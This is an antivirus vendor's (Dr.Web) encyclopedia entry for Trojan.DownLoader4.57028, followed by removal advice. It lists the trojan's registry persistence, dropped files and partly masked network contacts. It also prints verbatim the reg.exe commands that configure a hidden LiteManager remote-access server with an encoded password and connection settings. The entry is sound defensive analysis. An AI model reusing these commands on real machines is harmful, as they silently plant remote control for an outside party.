Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.DownLoader4.57028

Добавлен в вирусную базу Dr.Web: 2011-09-16

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ROM' = '%WINDIR%\ROM\ROMServer.exe'
Вредоносные функции:
Создает и запускает на исполнение:
  • %WINDIR%\ROM\ROMFUSClient.exe /tray
  • %WINDIR%\ROM\ROMServer.exe 
Запускает на исполнение:
  • <SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\LiteManager\v3.4\Server\Parameters" /f /v "NoIPSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006f006d005f0063006f006e006e006500630074005f00620079005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d002200340034003000300022003e003c006100750074006f005f0063006f006e006e006500630074003e0074007200750065003c002f006100750074006f005f0063006f006e006e006500630074003e003c007500730065005f006c006d005f006e006f00690070003e0074007200750065003c002f007500730065005f006c006d005f006e006f00690070003e003c006e006f00690070005f0068006f00730074003e003c002f006e006f00690070005f0068006f00730074003e003c006e006f00690070005f0070006f00720074003e0035003600350031003c002f006e006f00690070005f0070006f00720074003e003c006e006f00690070005f00690064003e00740065007300740073006500720076006500720064006d0073003c002f006e006f00690070005f00690064003e003c0069006e00740065007200760061006c003e0035003c002f0069006e00740065007200760061006c003e003c006e006f00690070005f007500730065005f006e00650077005f006d00610069006e005f006e006f00690070003e00660061006c00730065003c002f006e006f00690070005f007500730065005f006e00650077005f006d00610069006e005f006e006f00690070003e003c006e006f00690070005f006e00650077005f006d00610069006e005f0068006f00730074003e00380039002e003100300038002e003100300031002e00360031003c002f006e006f00690070005f006e00650077005f006d00610069006e005f0068006f00730074003e003c006e006f00690070005f006e00650077005f006d00610069006e005f0070006f00720074003e0035003600350031003c002f006e006f00690070005f006e00650077005f006d00610069006e005f0070006f00720074003e003c002f0072006f006d005f0063006f006e006e006500630074005f00620079005f00690064005f00730065007400740069006e00670073003e000d000a00
  • <SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\LiteManager\v3.4\Server\Parameters" /f /v "ROMCalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d002200340034003000300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0064007200610077005f0075007300650072006e0061006d0065005f006f006e005f0069006d006100670065003e00660061006c00730065003c002f0064007200610077005f0075007300650072006e0061006d0065005f006f006e005f0069006d006100670065003e003c007500730065005f006e00650077005f00660069006c0065005f0070006100740068003e00660061006c00730065003c002f007500730065005f006e00650077005f00660069006c0065005f0070006100740068003e003c006e00650077005f00660069006c0065005f0070006100740068003e003c002f006e00650077005f00660069006c0065005f0070006100740068003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
  • <SYSTEM32>\reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "ROM" /t REG_SZ /d "%WINDIR%\ROM\ROMServer.exe" /f
  • <SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\LiteManager\v3.4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "%WINDIR%\rom\ROMFUSClient.exe"
  • <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\Install.bat" "
  • <SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\LiteManager\v3.4\Server\Parameters" /f /v "Pwd" /t REG_BINARY /d d706549afadad5df20fe4855c22857df
  • <SYSTEM32>\reg.exe ADD "HKLM\SYSTEM\LiteManager\v3.4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020104506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c02050c50617373776f726444617461060c6b427055475357674730773d084869646553746f70080c497046696c7465725479706502021750726f7465637443616c6c6261636b53657474696e6773081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265080e44697361626c6552656765646974080d48696465496e7465726661636502000d44697361626c6541564368617408144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e6408064c6f67557365081144656e696564436861744d65737361676508155573657243616e5265737472696374536572766572081444656e696564416363657373546f536572766572080f53686f77436f6e6e6563744279494408125573654854545050726f7879536572766572080950726f78795479706502000950726f7879506f727402001350726f787941757468656e7469636174696f6e081243686174436c69656e7453657474696e67730c780900002f2f343841443841654142744147774149414232414755416367427a41476b41627742754144304149674178414334414d414169414341415a51427541474d416277426b41476b416267426e41443041496742564146514152674174414445414e674169414438415067414e41416f4150414279414738416251426641474d4161414268414851415877426a414777416151426c414734416441426641484d415a51423041485141615142754147634163774167414859415a51427941484d41615142764147344150514169414451414e414177414441414967412b414477415a6742764148494162514266414863416151426b414851416141412b414459414e414177414477414c77426d41473841636742744146384164774270414751416441426f414434415041426d4147384163674274414638416141426c41476b415a77426f4148514150674130414467414d414138414338415a6742764148494162514266414767415a5142704147634161414230414434415041426d4147384163674274414638416241426c414759416441412b414451414e674134414477414c77426d4147384163674274414638416241426c414759416441412b414477415a67427641484941625142664148514162774277414434414e414134414467415041417641475941627742794147304158774230414738416341412b414477415a6742764148494162514266414855416377426c414849416377426641484141595142754147554162414266414863416151426b414851416141412b414445414e514177414477414c77426d4147384163674274414638416451427a414755416367427a4146384163414268414734415a5142734146384164774270414751416441426f414434415041426d4147384163674274414638416141427641484941615142364147384162674230414745416241426641484d416341427341476b4164414230414755416367412b414449414e414177414477414c77426d4147384163674274414638416141427641484941615142364147384162674230414745416241426641484d416341427341476b4164414230414755416367412b414477416451427a41475541636742664147344159514274414755415877426841484d415877427541476b415977427241473441595142744147554150674230414849416451426c414477414c77423141484d415a5142794146384162674268414730415a5142664147454163774266414734416151426a4147734162674268414730415a51412b414477416267427041474d4161774275414745416251426c4144344150414176414734416151426a4147734162674268414730415a51412b4144774161414270414751415a514266414730416551427a414755416241426d4146384161514275414638416451427a4147554163674266414777416151427a414851415067426d414745416241427a4147554150414176414767416151426b414755415877427441486b416377426c414777415a67426641476b4162674266414855416377426c414849415877427341476b4163774230414434415041426f41476b415a41426c4146384159774276414730416341426641473441595142744147554158774270414734415877427341476b4163774230414434415a674268414777416377426c414477414c77426f41476b415a41426c4146384159774276414730416341426641473441595142744147554158774270414734415877427341476b416377423041443441504142794147554162514276414851415a514266414767416151426b414755415877426a41473841625142774146384162674268414730415a51426641476b4162674266414777416151427a414851415067426d414745416241427a4147554150414176414849415a514274414738416441426c4146384161414270414751415a51426641474d41627742744148414158774275414745416251426c4146384161514275414638416241427041484d416441412b414477416367426c4147304162774230414755415877426f41476b415a41426c414638415a6742794147384162514266414855416377426c414849415877427341476b4163774230414434415a674268414777416377426c414477414c7742794147554162514276414851415a514266414767416151426b414755415877426d4148494162774274414638416451427a4147554163674266414777416151427a4148514150674138414849415a514274414738416441426c4146384162514276414751415a51412b4144414150414176414849415a514274414738416441426c4146384162514276414751415a51412b4144774164774270414734415a41427641486341587742764147344158774230414738416341412b414759415951427341484d415a5141384143384164774270414734415a41427641486341587742764147344158774230414738416341412b414477416367426c4147304162774230414755415877423341476b416267426b414738416477426641473841626742664148514162774277414434415a674268414777416377426c414477414c7742794147554162514276414851415a51426641486341615142754147514162774233414638416277427541463841644142764148414150674138414759416151427941484d4164414266414730415a51427a41484d415951426e4147554150674138414338415a6742704148494163774230414638416251426c41484d4163774268414763415a51412b414477416367426c4147304162774230414755415877423141484d415a5142794146384159774268414734416441426641474d416241427641484d415a51426641474d4161414268414851415067426d414745416241427a4147554150414176414849415a514274414738416441426c414638416451427a414755416367426641474d4159514275414851415877426a414777416277427a414755415877426a4147674159514230414434415041423141484d415a514279414638416151426b41443441657742474144674152674245414459414d51413541446b414c514135414445414f514242414330414e414179414463414d514174414549414f514177414449414c514177414549414e674135414455414d77424341454d414e674130414449414e674239414477414c77423141484d415a514279414638416151426b41443441504141764148494162774274414638415977426f414745416441426641474d41624142704147554162674230414638416377426c4148514164414270414734415a77427a414434414451414b41413d3d0d417574684b6579537472696e67068451674243414467414f414242414459414e774177414549414d674179414549414d674247414463414f51417a414467414d414177414545414d774242414551414d674245414455414e41424641446b414f414132414430414e414177414467414d414178414334414f51413541446b414f51413541446b414f51413541446b414f51413d0000
Изменения в файловой системе:
Создает следующие файлы:
  • %WINDIR%\ROM\HookDrv.dll
  • %WINDIR%\ROM\AledensoftIpcServer.dll
  • %WINDIR%\ROM\ROMFUSClient.exe
  • %WINDIR%\ROM\ROMwln.dll
  • %WINDIR%\ROM\ROMServer.exe
  • %TEMP%\1.tmp\AledensoftIpcServer.dll
  • %TEMP%\1.tmp\HookDrv.dll
  • %TEMP%\1.tmp\Install.bat
  • %TEMP%\1.tmp\ROMFUSClient.exe
  • %TEMP%\1.tmp\ROMwln.dll
  • %TEMP%\1.tmp\ROMServer.exe
Удаляет следующие файлы:
  • %TEMP%\1.tmp\ROMwln.dll
  • %TEMP%\1.tmp\AledensoftIpcServer.dll
  • %TEMP%\1.tmp\Install.bat
  • %TEMP%\1.tmp\HookDrv.dll
  • %TEMP%\1.tmp\ROMFUSClient.exe
  • %TEMP%\1.tmp\ROMServer.exe
Сетевая активность:
Подключается к:
  • 'li###anager.ru':80
  • '89.##8.101.61':5651
TCP:
Запросы HTTP GET:
  • li###anager.ru/noip.txt
UDP:
  • DNS ASK li###anager.ru

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке